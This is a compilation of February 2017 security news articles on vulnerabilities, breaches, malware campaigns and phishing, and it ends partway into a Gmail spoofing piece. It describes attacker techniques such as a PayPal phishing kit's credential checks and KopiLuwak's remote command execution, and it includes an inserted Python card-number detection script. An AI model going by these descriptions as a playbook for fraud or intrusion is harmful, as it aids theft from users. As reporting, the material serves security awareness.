Chinese hackers were behind the cyber espionage campaign on the Lockheed Martin F-35 Joint Strike Fighter that caused the arrest of a Chinese national.

In July 2016, the US sentenced the Chinese hacker involved in the theft of industrial secrets on the F-22 and F-35 fighter jets and the C-17 transport aircraft.

Military experts know very well that many Russian and US jets are almost identical to the ones developed by China.


Authentication Bypass Vulnerability found in Cisco Prime Home product
3.2.2017 securityaffairs Vulnerebility

The experts at Cisco have discovered a critical authentication bypass vulnerability in Cisco Prime Home during internal security testing.
Cisco has released a security update for the Cisco Prime Home remote management and provisioning solution to fix a flaw that could be exploited to bypass authentication. Cisco's experts discovered the critical flaw during internal security testing.

Cisco Prime Home is a product used by Internet service providers (ISPs) to view customers’ home networks; it allows them to make configuration changes and software upgrades, and can be used for remote diagnostics.

The flaw, tracked as CVE-2017-3791, resides in the web-based user interface of Cisco Prime Home; it can be remotely exploited by an unauthenticated attacker to bypass authentication and execute any action with administrator privileges.

“The vulnerability is due to a processing error in the role-based access control (RBAC) of URLs. An attacker could exploit this vulnerability by sending API commands via HTTP to a particular URL without prior authentication.” states the Cisco advisory. “An exploit could allow the attacker to perform any actions in Cisco Prime Home with administrator privileges.”


The flaw affects Cisco Prime Home versions 6.3, 6.4 and 6.5; versions 5.2 and earlier are not affected. Cisco fixed the issue in version 6.5.0.1. It is important to highlight that no workaround is available.

The experts at the Cisco Product Security Incident Response Team (PSIRT) are not aware of any public announcements or exploitation of the flaw.


Hacker Leaks Tools Stolen From Cellebrite

3.2.2017 securityweek Hacking
The hacker who recently breached the systems of Israel-based mobile forensics company Cellebrite leaked some tools on Thursday and promised to dump more of the stolen data in the future.

While its investigation is still ongoing, Cellebrite has confirmed that someone had gained unauthorized access to its systems, stealing roughly 900 Gb of data.

According to the company, most of the data represents logs from its end-user licensing system my.Cellebrite and other unimportant files, such as 350 Gb of offline world map backups.

The compromised data does include customer contact information from a my.Cellebrite backup, but the company says “full passwords” or payment information have not been obtained – although it has admitted that some password hashes have been stolen.

Cellebrite also admitted that the hacker gained access to information on technical support inquiries, but claims the exposed files are not related to open support cases.

“Contrary to some erroneous reports, the attack did not impact any Cellebrite intellectual property related to the delivery of Cellebrite Forensic products and services, such as proprietary source code,” the company stated. “There is no increased risk to Cellebrite Forensic customers as a result of normal, ongoing use of Cellebrite UFED software and hardware, including routine software updates.”

In an effort to prove that he had stolen much more than just basic contact information, the hacker leaked what he claims to be “exploits” for iOS, Android and BlackBerry devices.

The download links no longer work, but Vice’s Motherboard learned from forensics expert Jonathan Zdziarski that many of the leaked iOS-related files appear to be widely available tools from the jailbreaking community. Zdziarski said he would not call the leaked files “exploits.”

In a message posted on Pastebin, the hacker admitted that the Apple tools are widely available, but claimed that the BlackBerry tools are “worth a look at.”

Cellebrite told Motherboard that the tools leaked this week are part of the distribution package of its application, but reiterated that source code was not compromised.

The hacker said he also plans on leaking what he describes as “a sample of files retrieved via the weaponized Cellebrite update service deployed on MS Windows based devices and desktops (SYSTEM privs) within the customer infrastructure.”


SQL Slammer Worm Crawls Back

3.2.2017 securityweek Virus
SQL Slammer, a tiny worm that managed to wreak havoc across the Internet on January 25, 2003, appears to have recommenced activity, Check Point security researchers warn.

The computer worm was first spotted on the day it caused a denial of service condition on tens of thousands of servers worldwide by overloading Internet objects such as servers and routers with a massive number of network packets. Within 10 minutes of its first emergence, SQL Slammer had managed to infect most of its roughly 75,000 victims.

SQL Slammer was based on proof-of-concept code demonstrated at the Black Hat Briefings by David Litchfield, who discovered a buffer overflow bug in Microsoft's flagship SQL Server and Desktop Engine database products. Although the vulnerability had been patched by Microsoft six months before the worm hit, many installations weren’t patched, and the malicious code could easily propagate.

Also referred to as the Sapphire Worm and Helkern, SQL Slammer is only 376 bytes in size, so it fits inside a single packet, a feature that allowed it to propagate rapidly when it hit. The worm sent a formatted request to UDP port 1434 and caused infected routers to start sending the malicious code to random IP addresses, which resulted in a denial of service condition on targets.

Although it remained dormant for over a decade, SQL Slammer appears to have restarted activity, Check Point security researchers warn. According to data collected by Check Point, there was a massive increase in the number of attack attempts between November 28 and December 4, 2016. SQL Slammer was one of the top malware detected in the timeframe.

[Chart: SQL Slammer infections (Image Credit: Check Point)]

The observed attack attempts had destinations in 172 countries, with 26% of the attacks targeting networks in the United States. According to Check Point, this shows that the newly recorded SQL Slammer activity wasn’t a targeted attack, but rather a larger wave of attacks.

The security firm also notes that the largest number of attack attempts came from IP addresses located in China, Vietnam, Mexico, and Ukraine.

“To summarize, although the Slammer worm was primarily spread during 2003, and has barely been observed in the wild over the last decade, the massive spike in propagation attempts that was observed in our data leads us to wonder – is the worm trying to make a comeback?” Check Point concludes.


PayPal Phishing Attack Immediately Verifies Credentials

3.2.2017 securityweek Phishing
A newly observed phishing campaign targeting PayPal users employs checks to immediately verify whether the entered login credentials are legitimate or not, Proofpoint reveals.

Using email as the distribution method, attackers lured users to a well-crafted phishing page that appeared to be a legitimate PayPal login page, but was actually the first step in an elaborate scheme meant to trick users into revealing their banking and personal information. (The attack is different from a separate sophisticated phishing campaign targeting PayPal users detailed earlier this week.)

The phishing page, researchers say, returns a “vaguely worded error message” if the wrong credentials are entered, something that doesn’t usually happen with phishing landing pages, as they tend to accept any credentials that users enter. The newly observed page, however, verifies the entered credentials with PayPal before moving forth with the scheme.

To perform the check, the crooks were using a decommissioned service in PayPal, meant to allow one to purchase a gift card from a user. “If the queried email account does not exist, the login supplied to the phishing landing page is discarded, helping to ensure that the phisher gets a higher percentage of valid credentials. The code does not check the password, only that the email account exists on PayPal,” Proofpoint researchers note.

Usually, scammers verify the stolen credentials after they managed to acquire a larger number of potential logins, but the new approach eliminates the need to perform the validation at a later date. On top of that, researchers say, this specific approach can fool automated analysis tools.

Once a valid PayPal email address is used, the victim is presented with a reassuring welcome page, followed by a phishing page on which users are required to confirm the credit card information they have associated with their PayPal account. Because the phishing kit comes with support for multiple languages, it can appear legitimate to users in many locations.

The phishing kit was also designed to check the credit card number that the victim supplies, making sure it passes the Luhn algorithm, as well as to perform a lookup against the card number to retrieve additional information. After validating the credit card, the kit asks the victim to enter security information about their card.
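The Luhn (mod-10) check mentioned above is the same test a defender's DLP or log-scrubbing tooling uses to recognise card-number-shaped strings before they end up in tickets or logs. The block below is an added example written for this page, not code from Proofpoint or from the kit; the log lines are constructed, and 4111 1111 1111 1111 is a widely published test number, not a real card.

```python
import re

def luhn_valid(number: str) -> bool:
    """Return True if the digit string passes the Luhn (mod-10) check."""
    digits = [int(c) for c in number if c.isdigit()]
    if len(digits) < 2:
        return False
    total = 0
    # Walk from the rightmost digit and double every second digit;
    # a doubled value above 9 has its digits summed (equivalent to -9).
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

# 13 to 19 digits, optionally separated by single spaces or hyphens,
# not immediately preceded or followed by another digit.
CANDIDATE_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

def find_card_numbers(text: str) -> list:
    """Return Luhn-valid 13..19 digit sequences found in text, as digit strings.

    The Luhn filter removes most false positives (order ids, timestamps)
    that merely look like card numbers.
    """
    found = []
    for m in CANDIDATE_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            found.append(digits)
    return found

def mask(pan: str) -> str:
    """Keep the first 6 (BIN) and last 4 digits, mask everything in between."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]

# Constructed sample log: one Luhn-valid test card, one digit string that
# fails Luhn, and a 17-digit order id that is not a card number.
SAMPLE_LOG = (
    "2017-02-03 10:12:01 checkout ok card=4111 1111 1111 1111 amount=19.99\n"
    "2017-02-03 10:12:05 checkout fail card=1234-5678-9012-3456 reason=decline\n"
    "2017-02-03 10:12:09 order id=20170203101209123 status=shipped\n"
)

if __name__ == "__main__":
    for pan in find_card_numbers(SAMPLE_LOG):
        print("card number found in log:", mask(pan))
```

Run stand-alone, the script reports the single Luhn-valid number from the constructed log in masked form; the other two digit strings are rejected by the mod-10 test.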

Users are also asked to link their bank accounts to their PayPal account, and are offered a number of well-known retail banks to choose from. Stolen bank branding gives the phishing page a legitimate look. Next, the user is asked to enter login credentials for their bank, with the page claiming that the information is not saved, which is, of course, false.

“The user is then prompted for routing information for the bank account. Finally, the phishing kit prompts the user for identity information such as a driver's license number or other identifying document that can be uploaded directly to the phishing kit. If the victim clicks the ‘Don't have your ID now?’ button, they simply skip this screen,” Proofpoint said.

After attempting to gather all of the aforementioned personal and financial information from the victims, the phishing kit then redirects them to the legitimate PayPal website. According to Proofpoint, in addition to using inventive phishing pages, the scheme uses an administrative backend similar to what remote access Trojans (RATs) usually employ.

Through this panel, attackers can view visitor information, access stolen credentials, and use a simple interface to modify settings. There is even an option to enable a “selfie page” where Flash is used to interact with the victim's webcam, most probably to allow the phisher to snap a photo of the victim for later use. The admin panel also features a page for Trojans, but the feature appears to be under development.

“As attackers continue to turn away from the use of exploits and other means of compromising victim PCs and stealing information via malware, they are developing increasingly sophisticated means of collecting credentials and other data directly through phishing schemes. The use of phishing kits like the one detailed here provides threat actors with ready access to turnkey templates and administrative backends that make harvesting data from unsuspecting victims all too easy,” Proofpoint says.

The phishing kit also illustrates the advanced state of “crimeware as a service” and how straightforward conducting phishing scams can be. The existence of an admin panel with the aforementioned options is quite rare among credential phishing kits at the moment, but similar panels were previously associated with APT activities. However, this type of admin panel is expected to become more common and, understandably, popular with phishing actors, Proofpoint concludes.


Radio Stations Hacked to Play "F**k Donald Trump" on Repeat Across the Country
3.2.2017 thehackernews Hacking
It’s just two weeks into the Trump presidency, but his decisions have caused utter chaos around the country.
One such order signed by the president banned both refugees and visa holders from seven Muslim-majority countries (Iraq, Iran, Libya, Yemen, Somalia, Syria, and Sudan) from entering the United States, resulting in the unexpected arrest of some travelers at airports.
Now, it seems that some anti-Trump protesters have publicly declared their fight against the president by exploiting a known flaw in low power FM (LPFM) radio transmitters to play a song the radio stations didn't intend to broadcast.
Radio stations in South Carolina, Indiana, Texas, Tennessee and Kentucky, were hacked recently to broadcast the Bompton-based rapper YG and Nipsey Hussle's anti-Trump song "Fuck Donald Trump," which was already a radio hit in some parts of the country last year, several sources report.
The song was repeatedly played on Monday night, according to RadioInsight, and the news of the incident began emerging shortly after Trump's inauguration on January 20, eight days before hackers hacked 70 percent of the police CCTV cameras in Washington DC.
Hackers gained access to the radio stations by exploiting known vulnerabilities in Barix Exstreamer devices which can decode audio file formats and send them along for LPFM transmission.
Over a dozen radio stations experienced the hack in recent weeks, though some of them shut down their airwaves as quickly as possible in an attempt to avoid playing the inflammatory "FDT (Fuck Donald Trump)" song on loop.
The hacker or group of hackers behind the cyber attack is still unknown. The affected stations so far include:
105.9 WFBS-LP Salem, S.C.
Radio 810 WMGC/96.7 W244CW Murfreesboro TN
101.9 Pirate Seattle
100.9 WCHQ-LP Louisville
100.5 KCGF-LP San Angelo TX
There are also unconfirmed reports that radio stations in California, Indiana, and Washington State were affected as well.
Has any of the radio stations you listen to been hit by the hackers? Let us know in the comments!


Critical McAfee ePO Flaw Ideal For Reconnaissance

3.2.2017 securityweek Vulnerebility
Intel Security has fixed a critical vulnerability in its McAfee ePolicy Orchestrator (ePO) centralized security management product. Researchers warn that the flaw is ideal for profiling the users and infrastructure of an organization.

The flaw, tracked as CVE-2016-8027 and assigned a CVSS score of 10.0, is a blind SQL injection discovered by a member of the Cisco Talos Vulnerability Development Team. The security hole can be triggered using specially crafted HTTP POST requests and it allows an unauthenticated attacker to obtain information from the application database.

McAfee ePO allows organizations to manage their security policies from a central console. The solution requires the deployment of agents on each endpoint, and these agents communicate over a proprietary protocol known as SPIPE.

The vulnerable component is in the application server and it can be reached directly via the administration console or over SPIPE. Researchers warned that exploitation of the flaw can also allow attackers to impersonate an agent, which can reveal information related to that agent.

“Vulnerabilities like this can allow deep insight into the organisation without an attacker requiring any privileged access to centralised platforms such as Active Directory, with this access an attacker can profile users and the infrastructure passively,” Talos researchers said in a blog post.

The security hole affects McAfee ePO version 5.1.3 and earlier, and 5.3.2 and earlier. Intel Security has released hotfixes to address the vulnerability. While the vendor says there are no mitigations or workarounds, Talos believes attacks can be prevented by limiting access to port 8443.

Cisco has published technical details on the vulnerability and Intel Security has released an advisory with information on affected versions and patches.

It’s not uncommon for researchers to find vulnerabilities in enterprise security products. Serious flaws have also been identified in solutions from Symantec, FireEye, Kaspersky, Sophos and several other vendors.


Russia-Linked "Turla" Group Uses New JavaScript Malware

3.2.2017 securityweek Virus
The Russia-linked cyber espionage group known as Turla has been using a new piece of JavaScript malware to profile victims, Kaspersky Lab reported on Thursday.

Turla, an advanced persistent threat (APT) actor that has been active since at least 2007, is believed to be responsible for several high-profile attacks, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command. The group is also known as Waterbug, Venomous Bear and KRYPTON, and some of its primary tools are tracked as Turla (Snake and Uroburos), Epic Turla (Wipbot and Tavdig) and Gloog Turla.

The cyberspies have been mainly interested in organizations located in Europe and the United States. Recent attacks observed by researchers at Kaspersky Lab appear to have targeted organizations in Greece, Qatar and Romania.

In a report sent out to customers in June 2016, Kaspersky revealed that Turla had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents. In late November, the security firm spotted a new JavaScript payload designed mainly to avoid detection. Microsoft researchers have also been monitoring the threat.

The new malware, dubbed KopiLuwak, has been delivered to at least one victim using a document containing an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus. Since the document appears to have been sent by the Qatar ambassador’s secretary, experts believe the attackers may have breached the diplomatic organization’s network.

The final KopiLuwak payload is hidden under several JavaScript layers. Once it becomes persistent by creating a registry key, the malware executes a series of commands in an effort to collect information about the infected system. The harvested data is stored in a temporary file that is deleted after it’s encrypted and stored in memory.

KopiLuwak then attempts to contact its command and control (C&C) servers. These are compromised websites whose address has been hardcoded into the malware.

The C&C can instruct the malware to sleep, exit and terminate C&C communications until the next reboot, uninstall itself, and run arbitrary commands on the infected system using Wscript.shell.run().

One of the C&C domains had expired, allowing Kaspersky to acquire it and use it as a sinkhole. Several systems connected to this domain, but the most interesting IP was one associated with the Greek Parliament.

For the time being, Kaspersky says KopiLuwak is less popular than Icedcoffee, but the company believes the new malware will be used more in the future as a first-stage delivery mechanism and victim profiler.

“Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents,” explained Kaspersky’s Brian Bartholomew. “While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method.”


Security Intelligence Automation Startup LogicHub Emerges from Stealth

3.2.2017 securityweek Security
Machine learning and artificial intelligence seem to be the way forward in cyber security; nearly all new companies and products boast that capability. But one new company, emerging from stealth on Wednesday, is a little different. Most current security systems seek to automate knowledge; this one seeks to automate intelligence -- the 'how' over and above the 'what'.

LogicHub announced its arrival with news of an $8.4 million Series A funding round led by Storm Ventures and Nexus Venture Partners. Its purpose is to build a new type of threat detection system based on human security intelligence rather than simply big data analysis. This is based on one primary observation: a top grade human analyst is better at detecting threats than the current generation of threat detection systems.

"We have done what we call cyberhunt challenges with 75 companies," CEO and co-founder Kumar Saurabh told SecurityWeek. "We provided a volume of data containing a threat, and asked each company if its automated system would find it. In only two out of the 75 challenges did the organization say its systems had more than a 50% chance of doing so. But they also said their in-house expert analyst would find it with 90+% confidence."

But when he next asked if they could find the threat in two minutes, the response was resounding: it would take more like two hours. "This is what I hear again and again," he said: "the systems are not clever enough, and the analysts are not fast enough." His solution is to develop a system that can combine the intelligence of analysts with the speed of machines.

"At the end of the day," says Saurabh, "experienced cyber analysts are much better at detecting threats and triaging false alarms than the security tools available, but given the magnitude of the challenge, most teams can only inspect a tiny fraction of all security events collected in-depth. To combat this, LogicHub has found a way to capture and automate the knowledge and expertise of the most skilled cyber analysts, which results in much deeper threat detection."

This is the conundrum that LogicHub has set itself to solve: automating the human expert analyst's threat hunting process rather than just generating and maintaining more and more rules on recognizing known threat indicators. By capturing expertise into a security intelligence 'brain', that expertise can then be used by lower grade analysts in the future. Furthermore, if the expert analyst is tempted away by a higher salary elsewhere, his or her expertise does not entirely leave at the same time.

It requires a different type of architecture, and Saurabh points to Google Search as an example. It is fast, clever, and able to 'predict' user requirements. "One of the key things Google did a couple of years ago," he explained, "was they built a knowledge graph. And that knowledge graph has tens of millions of entities and relationships. They use that knowledge graph to link entities by relationships so that it understands the data it contains."

In fact, in October 2016, City University of New York professor Jeff Jarvis tweeted, "Google knowledge graph has more than 70 billion facts about people, places, things. + language, image, voice translation."

"The difference between Knowledge Graph and the security solutions available today is that they don't understand the data," said Saurabh. "They do nothing to tell the user how to navigate the data." It's like the difference between modern GPS and a road atlas, he continued. "With the atlas, you have the data, but you have to figure out what that data means by yourself."

In threat analysis, there are very few people who really understand what the data means. "Since that understanding is trapped in their heads, it can only be leveraged in a very limited way. With automation, we can take the expertise that is trapped in their heads and turn it into a system so that what one analyst knows and applies can be shared with ten other people on the security team. Over time you can build a system that is more available as a service, and can be used by hundreds of companies -- it becomes a security brain."

Developing that security brain is what LogicHub is doing. It has an augmentation tool that automates the capture of analyst methods, so that different analytical methods from different analysts can be combined into the intelligence automation tool. "A security analyst with our security intelligence automation platform can become equal to ten analysts. You have to use the augmentation tool to get there; but it has that potential."

This system will be offered as an on-premise solution for those companies not yet comfortable with the cloud and sharing data, and as a cloud service that combines and shares analytical expertise with all cloud customers.


Identity Fraud Hit 15.4 Million U.S. Victims in 2016: Report

3.2.2017 securityweek Crime
In 2016, 15.4 million U.S. consumers became identity fraud victims, a 16% increase over the previous year, according to a recent Javelin Strategy & Research study.

Despite increased efforts from the industry to tackle identity fraud, cybercriminals managed to net two million more victims in the last year, with the incurring damages going up by $1 billion to reach $16 billion, Javelin Strategy & Research’s 2017 Identity Fraud Study shows. The suffered losses are in line with those reported two years ago.

Payment card fraud experienced a resurgence in 2016, with card-not-present (CNP) registering an increase of 40%. As the report explains, “the increase in EMV cards and terminals was a catalyst for driving fraudsters to shift to fraudulently opening new accounts.” The research also claims that, although crooks are becoming better at evading detection, consumers with an online presence are detecting fraud quicker.

Fraud trends, however, are worrying, especially with 6.15% of consumers becoming victims of identity fraud in 2016. Compared to the previous year, almost 2 million more people fell victim, mainly fueled by a spike in existing card fraud, the report shows.

While the level of point-of-sale (POS) fraud remained almost unchanged compared to 2014 and 2015 levels, account takeovers (ATO) and the associated losses rose notably in 2016. ATO losses registered a 61% increase compared to the previous year, reaching $2.3 billion, while incidence went up 31%.

According to the research and consulting firm, account takeover remains one of the most challenging fraud types for consumers. Victims, the company says, pay an average of $263 out of pocket costs to resolve an incident. The total hours spent to solve this type of fraud was 20.7 million in 2016, a 6 million hour increase over 2015.

The study also says that fraudsters have become much better at avoiding detection, with new-account fraud (NAF) victims being notably more likely to discover fraud through review of their credit report (15%) or when they were contacted by a debt collector (13%).

The annual Identity Fraud Study has surveyed 69,000 respondents since 2003, and identified and analyzed four consumer personas for this year: Offline Consumers, Social Networkers, e-Commerce Shoppers and Digitally Connected.

Because they have little online presence, Offline Consumers are exposed to fewer fraud risks, but they incur higher fraud amounts than other fraud victims and need more than 40 days to detect fraud. Because they share their social life on digital platforms but have little presence on e- or m-commerce sites, Social Networkers face a 46% higher risk of account takeover fraud.

E-commerce buyers (including mobile shoppers) expose their financial information and are at risk of existing card fraud. However, 78% of them detect fraud within one week of it beginning, thus minimizing losses. As for the Digitally Connected Consumer category, it includes people who have extensive social network activity, shop online frequently, and adopt new digital technologies fast. They face a 30% higher risk of being a fraud victim.

“After five years of relatively small growth or even decreases in fraud, this year’s findings drive home that fraudsters never rest and when one area is closed, they adapt and find new approaches. The rise of information available via data breaches is particularly troublesome for the industry and a boon for fraudsters. To successfully fight fraudsters, the industry needs to close security gaps and continue to improve and consumers must be proactive too,” Al Pascual, senior vice president, research director and head of fraud & security, Javelin Strategy & Research, said.

The 2017 ID Fraud survey was conducted among 5,028 U.S. adults over age 18 on KnowledgePanel, the company said. The sample is believed to be representative of the U.S. census demographics distribution, recruited from the Knowledge Networks panel. The data was collected between Nov 5 and Nov 21, 2016.


Czech users are increasingly threatened by malicious downloaders

3.2.2017 SecurityWorld Viruses
Although the dominance of the Danger malware has ended, other dangerous downloaders of malicious code have replaced it.

The overwhelming predominance of the Danger malicious code over all other internet threats in the Czech Republic has, for now, passed.

In January this malware still represented the most frequently detected threat, but its share fell by more than 30 percentage points to 11.05 percent. Other types of malicious code, on the other hand, gained ground, according to statistics from Eset.

“The decline in the share of the Danger downloader is really significant. In December it represented almost every second recorded threat, in January only every tenth. However, we found a significant increase in the occurrence of various types of malware from the TrojanDownloader family,” says Miroslav Dvořák, technical director of Eset.

According to him, as with Danger, this is code that tries to load additional malicious code onto the compromised device.

The second most frequent January threat in the Czech Republic was a member of the above-mentioned family, specifically VBA/TrojanDownloader.Agent.CHO, which accounted for 5.03 percent of detected cases.

Third place went to the Changer malware, which Eset detects as JS/ProxyChanger. This malicious code makes it possible to redirect a legitimate request to a page planted by the attacker and thus obtain, for example, the victim's credit card number. Changer was behind 4.36 percent of the internet attacks detected in the Czech Republic.

Top 10 threats in the Czech Republic for January 2017:

1. JS/Danger.ScriptAttachment (11.05 %)

2. VBA/TrojanDownloader.Agent.CHO (5.03 %)

3. JS/ProxyChanger (4.36 %)

4. JS/TrojanDownloader.Nemucod (4.12 %)

5. JS/Kryptik.RE (3.38 %)

6. VBA/TrojanDownloader.Agent.CIY (2.55 %)

7. VBA/TrojanDownloader.Agent.CIQ (2.04 %)

8. Java/Adwind (2.01 %)

9. JS/TrojanDownloader.Iframe (1.73 %)

10. PowerShell/TrojanDownloader.Agent.DV (1.58 %)

Source: Eset, February 2017

New centers in the Czech Republic and Slovakia

Eset has also begun operating new centers focused on research and development; these branches are being established in Brno and in Žilina, Slovakia.

“We chose the center in Brno because of its geographic proximity to the Bratislava headquarters, the local base of technical universities and, of course, the IT talent available in this region,” says Juraj Malcho, chief technology officer of Eset.

In the case of Žilina in western Slovakia, this will be the company's third site in Slovakia. Besides the headquarters in Bratislava, Eset already has a development center in Košice, which focuses mainly on anti-spam technologies. By contrast, specialists from the Žilina branch will collaborate on the development of Eset's corporate products.


Two Arrested for Hacking Washington CCTV Cameras Before Trump Inauguration
3.2.2017 thehackernews Hacking
Two Arrested in London for Hacking Washington CCTV Cameras Before Trump Inauguration
Two suspected hackers have reportedly been arrested in London on suspicion of hacking 70 percent of the CCTV cameras in Washington with ransomware ahead of President Donald Trump's inauguration last month.
The arrests were made on 20 January by officers from the UK's National Crime Agency (NCA) following a request from United States authorities, but were not disclosed until now.
The NCA raided a house in the south of London last month and detained a British man and a Swedish woman, both 50 years old, reported The Sun.
Some 123 of the 187 police CCTV cameras used to monitor public areas in Washington DC stopped working on 12 January, just 8 days before the inauguration of Donald Trump, after a cyber attack hit the storage devices.
The cyber attack lasted for about three days, leaving the CCTV cameras unable to record anything between 12 and 15 January.
It was reported that the surveillance cameras were left useless after ransomware made its way onto the storage devices that record feed data from CCTV cameras across the city. The hackers demanded ransom money, but the Washington DC Police rejected their demand.
Ransomware is an infamous piece of malware that has been known for locking up computer files and then demanding a ransom in Bitcoins in order to help victims unlock their files.
However, instead of fulfilling ransom demands of hackers, the DC police took the storage devices offline, removed the infection and rebooted the systems across the city.
The storage devices were successfully put back to rights, and the surveillance cameras were back to work. According to authorities, no valuable data was lost, and the ransomware infection merely crippled the affected computer network devices.
The "officers executed a search warrant at an address in Natal Road, SW16, on the evening of Thursday 19 January. A man and a woman were arrested and later bailed until April 2017," according to the NCA.
The intention of these two 50-year-old suspects is still unclear.


Popular hacking toolkit Metasploit adds hardware testing capabilities
3.2.2017 securityaffairs Hacking

The Metasploit hacking toolkit now includes a new hardware bridge that makes it easier for users to analyze hardware devices.
The popular offensive hacking toolkit Metasploit has become even more powerful: it now includes a hardware bridge for conducting security tests on hardware. This is a great help to users who have to test hardware, including IoT devices.

Metasploit already includes more than 1,600 exploits and 3,300 modules, with a huge hacking community that works on new modules and scripts.


Up until now, Metasploit allowed the creation of custom scripts for hardware testing; the update to the Hardware Bridge API now allows users to test a variety of hardware, including vehicles’ CAN buses.

The new Hardware Bridge API gives a precious instrument to customers focused on the development of hardware exploits.

The first update to the Hardware Bridge API is specifically designed for the testing of automotive systems; Rapid7, which maintains the tool, will soon add other modules to extend the capabilities of its product.

Metasploit aims to be a standard tool for a wide range of hardware platforms, including SCADA and industrial control systems (ICS), IoT systems, and software defined radio (SDR). The company believes the new capability makes Metasploit an ideal tool for conducting hardware-based network research.

“Metasploit condensed a slew of independent software exploits and tools into one framework and now we want to do the same for hardware,”

“Every wave of connected devices – regardless of whether you’re talking about cars or refrigerators – blurs the line between hardware and software. As we like to say, this hardware bridge lets you exit the Matrix and directly affect real, physical things,” explained Craig Smith, director of transportation research at Rapid7. “We’re working to give security professionals the resources they need to test and ensure the safety of their products — no matter what side of the virtual divide they’re on.”

“Much in the same way that the Metasploit framework helped unify tools and exploits for networks and software, the Hardware Bridge looks to do the same for all types of hardware.”


Russian cyber espionage group Turla leverages on a new JavaScript Malware
3.2.2017 securityaffairs Virus

The Russia-linked cyber espionage group known as Turla has been using a new piece of JavaScript malware to profile victims, Kaspersky Lab reported on Thursday.
Turla is the name of a Russian cyber espionage APT group (also known as Waterbug, Venomous Bear and KRYPTON) that has been active since at least 2007, targeting government organizations and private businesses.

The list of victims is long and includes also the Swiss defense firm RUAG and the US Central Command.

Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents.

Now experts at Kaspersky Lab have discovered a new piece of JavaScript malware linked to the dreaded group; the latest string of attacks targeted organizations in Greece, Qatar, and Romania.

In November both Kaspersky Lab and Microsoft discovered a new JavaScript payload designed mainly to avoid detection.

John Lambert (@JohnLaTwC) tweeted on 28 Jan 2017: “Qatar #malware DOC extracts payload by regex and drops a very interesting .JS backdoor #DFIR https://pastebin.com/2Wb3hH2S”
The new JavaScript malware dubbed KopiLuwak has been delivered to at least one victim leveraging a document containing an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus.


The malicious document appears to have been sent by the Qatar ambassador’s secretary; researchers from Kaspersky speculate that the cyber spies may have breached the diplomatic organization’s network.

“Based on the name of the document (National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc, it is presumed it may have been sent from the Qatar Ambassador’s secretary to the MoFA, possibly indicating Turla already had control of at least one system within Qatar’s diplomatic network.” states the report published by Kaspersky.

Malware researchers discovered that the author of KopiLuwak used multiple JavaScript layers to avoid detection; the malicious code gains persistence on the targeted machine by creating a registry key. Once it has infected a system, the malicious code executes a series of commands to collect information and exfiltrate data. Stolen data is temporarily stored in a file that is deleted after it’s encrypted and stored in memory.

The KopiLuwak JavaScript malware is controlled through a collection of compromised websites whose IP addresses are hardcoded into the malicious code.

“The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the actors to run arbitrary commands via Wscript.” continues the analysis.

The C&C can send arbitrary commands to the infected system using Wscript.shell.run().

Kaspersky analyzed the malware using the “sinkholing technique”: the researchers registered one of the C&C domains that had expired and used it as a sinkhole. In this way, the experts were able to analyze the traffic from infected systems that were contacting the C&C infrastructure. With this technique, the experts discovered that one of the victims used an IP address associated with the Greek Parliament.

Researchers from Kaspersky believe that KopiLuwak malware will be used more in the future.

“Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents,” explained Kaspersky’s Brian Bartholomew. “While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method.”

The Turla APT group continues to leverage on embedded macros in Office documents, an elementary technique that anyway allowed it to compromise high-value targets.


How much trust do you put into your Gmail inbox messages?
3.2.2017 securityaffairs Security

Given the high trust we have on Gmail we tend to believe that all messages that fall into our inbox are legit and safe, but there is something to know …
1. Introduction

Taking good care of e-mail messages is certainly among the first recommendations of any information security policy and user awareness program. The involved risks range from SPAM to Spear Phishing attacks, generally aimed to steal information or infect the victim’s computer. Most malicious messages are filtered by anti-“everything” engines before ever being delivered to the user’s mailbox, although some bypass those filters and require the user’s perspicacity to be detected.

Generally, our trust in the technology security filters is proportional to the reputation of the service provider. The higher our belief in the provider, the lower our attention to the risks tends to be. Given the high trust we have in Gmail, we tend to believe that all messages that fall into our inbox are legit and safe.

It turns out that, based on our findings this week at Morphus Labs, this “trust” logic should be revisited. We realized that a message that appears in your Gmail inbox folder, even marked as important and coming from one of your Gmail contacts with no spoofing or security alert, may have been forged by a fraudster or a cybercriminal impersonating that contact. As few people may be aware of this possibility, we decided to shed light on this problem with this article.

This document is divided into four parts. First, it presents some context on e-mail spoofing. Then, it walks through our e-mail spoofing experiment scenarios involving Gmail and Yahoo. Next, it presents an extra Gmail behavior and, finally, it offers advice on how users can identify spoofed Gmail messages, followed by some final words.

2. E-mail Spoofing

In this section, we will go through some SMTP concepts and how e-mail sender spoofing occurs. If you are familiar with those concepts, you can skip to the next section.

The Simple Mail Transfer Protocol (SMTP) is the standard protocol used for e-mail transmission over the Internet. Considering the rate of technology evolution and today’s security requirements, we may say that this protocol is, at least, anachronistic. Its first version was defined in 1982 by RFC 821 [1] and it has not evolved much since, mainly in security aspects.

Note that the SMTP protocol defines the message transport, not the message content. It defines, therefore, the mail envelope and its parameters, such as the message sender and recipient. The message content (body) and headers are defined by the standard STD 11 (RFC 5322) [2].

Basically, an SMTP transaction consists of three commands:

Mail From: establishes the message return address in case of delivery failure;

Rcpt to: establishes the message recipient. In case of multiple recipients, this command may be repeated for each one;

Data: this command signals the SMTP server to receive the content of the message, which consists of the message headers and body.

